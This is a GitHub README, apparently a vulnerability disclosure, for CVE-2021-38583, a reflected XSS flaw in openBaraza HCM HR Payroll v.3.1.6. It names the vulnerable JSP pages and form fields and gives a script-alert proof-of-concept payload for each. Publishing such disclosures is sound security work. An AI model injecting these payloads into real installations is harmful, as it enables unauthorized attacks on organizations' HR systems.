CVE-2021-38583 openBaraza HCM HR Payroll v.3.1.6 Reflected XSS vulnerability

openBaraza HCM HR Payroll v.3.1.6 does not properly neutralize user-controllable input, which allows reflected cross-site scripting (XSS) vulnerability on multiple pages.

https://openbaraza.org

https://sourceforge.net/projects/obhrms/?source=directory

Vulnerable pages:

http://serverip:9090/hr/subscription.jsp

affected: "number_of_employees" text box

payload: <script>alert('XSS')</script>

http://serverip:9090/hr/application.jsp

affected: "surname", "first_name", "middle_name", "applicant_email", "phoneapplicant_phone", "identity_card", "language" text boxes

payload: <script>alert('XSS')</script>

http://serverip:9090/hr/index.jsp?view=10:0:0&data=9

affected: "previous_salary", "expected_salary" text boxes

payload: <script>alert('XSS')</script>

http://serverip:9090/hr/index.jsp?view=44:0:3&data={new}

affected: "self_rating" text box

payload: <script>alert('XSS')</script>

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
2021-08-10_11-19-01.gif		2021-08-10_11-19-01.gif
2021-08-11_11-30-38.gif		2021-08-11_11-30-38.gif
2021-08-11_11-57-29.gif		2021-08-11_11-57-29.gif
2021-08-12_08-46-01.gif		2021-08-12_08-46-01.gif
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2021-38583 openBaraza HCM HR Payroll v.3.1.6 Reflected XSS vulnerability

Vulnerable pages:

About

Releases

Packages

charlesbickel/CVE-2021-38583

Folders and files

Latest commit

History

Repository files navigation

CVE-2021-38583 openBaraza HCM HR Payroll v.3.1.6 Reflected XSS vulnerability

Vulnerable pages:

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages